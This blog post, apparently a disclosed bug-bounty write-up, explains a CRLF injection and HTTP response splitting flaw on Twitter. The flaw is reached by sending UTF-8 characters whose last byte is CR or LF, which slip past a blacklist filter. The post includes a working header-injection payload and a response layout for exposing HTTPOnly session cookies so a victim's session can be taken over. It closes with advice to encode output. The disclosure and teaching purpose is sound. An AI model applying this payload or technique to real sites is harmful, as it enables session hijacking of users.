tl;dr Don't use blacklists

In this blog post, I would like to discourage developers from employing any blacklist based protection with a write-up of a CRLF Injection/HTTP Response Splitting vulnearbility on Twitter.

Websec 101

For those who don't know, CRLF Injection attack usually occurs when there is an input being reflected in a header field of a HTTP response. If the output is not properly sanitized, attackers can inject arbitrary headers or contents into the response. It may result in Open Redirect (Location), Session Fixation (Set-Cookie), XSS and whatnot.

The Story

Once upon a time, Twitter setup a page for ads haters to report ads violations. In the page, there are a couple of inputs being reflected in Set-Cookie. After a bit of fiddling, I discovered that non-printable control characters were not encoded which they should be. However, this issue alone did not lead to big problems because two critical control characters (CR and LF) were sanitized. More precisely, LF was replaced with a space and CR would result in HTTP 400 (Bad Request Error). Now what?

Mama always told me to learn from the past experience.

After a moment, I recalled there was an encoding bug in Firefox which involved some spec mis-behaviors. Basically, RFC 7230 states that most HTTP header field values use only a subset of the US-ASCII charset. Firefox followed the spec by stripping off any out-of-range characters when setting cookies instead of encoding them. The problem is obvious: blacklist based filter will fail because the input is safe until it is mutated.

At this point you might think we may be able to use that to bypass the detection by submitting a Unicode character which takes CR/LF as the last byte. This is actually not quite accurate. For example, a character like "嘊" (U+560A, %56%0a) still contains the LF character and hence can still be spotted.

Plot Twist

But don't forget we use UTF-8 to encode URL. That means we can use %E5%98%8A to represent U+560A. Surprisingly, Twitter decodes the input but does not encodes it in the output. So the flow is:

  1. We send a payload to the server with crafted Unicode characters which take CR/LF as the last byte and encode it in UTF-8
  2. Server receives the request but does not detect any malicious character
  3. Server decodes the input and removes out-of-range characters
  4. The output then contains clean CR/LF characters

Characters Mutation

Now that we can manipulate headers and contents by injecting CR/LF characters. For your information, here is a payload that sets a cookie: %E5%98%8A%E5%98%8DSet-Cookie:%20test

And So On...

Initially I thought this issue only happens in Set-Cookie. After reporting it to Twitter, I realized that any page that reflects inputs to header fields was vulnerable. Therefore I was thinking if we could do beyond XSS. While wandering around, I noticed that Twitter sets the cookie twitter_sess for every response, and apparently we can't extract it via XSS as it is protected by HTTPOnly. A quick thought came in mind: if Set-Cookie for twitter_sess appears after the injection point, then we can make it a part of the response body and extract it. Consider the following example where the value of foo is the injection point:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8[CR][LF]
Set-Cookie: foo=[CR][LF]
[CR][LF]
<img src="
Set-Cookie: twitter_sess=[...]; HTTPOnly[CR][LF]
[CR][LF]
<p class="twttr">Original response body</p>

And after that we can use dangling markups or normal XSS to get the session of a victim's

Although we cannot perform the attack on the ads report page because the Set-Cookie header for twitter_sess appears before the injection point, there are other affects pages that meet the attack requirements as mentioned before.

Ending

While testing the attack, I also found that Twitter now uses auth_token instead of twitter_sess for the user session. Luckily, the login page contains the Set-Cookie header for auth_token and it accepts a parameter redirect_after_login that redirects the user after logging in. The only barrier left was to stop the redirection and make browsers to render the page. This could be solved with Positive Technologies' research.

So there you have it. CRLF Injection and session takeover on Twitter. The prince and the princess lived happily ever after.

Conclusion

Do not rely on blacklists. Developers should either encode (or escape) the outputs or employ whitelist based protections. In fact, Twitter fixed it in a somewhat monkey-patch approach: Now out-of-range characters are disallowed but still it does not completely follow the spec. Better fix would be to limit the input format (e.g. alphanumeric only); or even better, encode the outputs.

References

Original report from HackerOne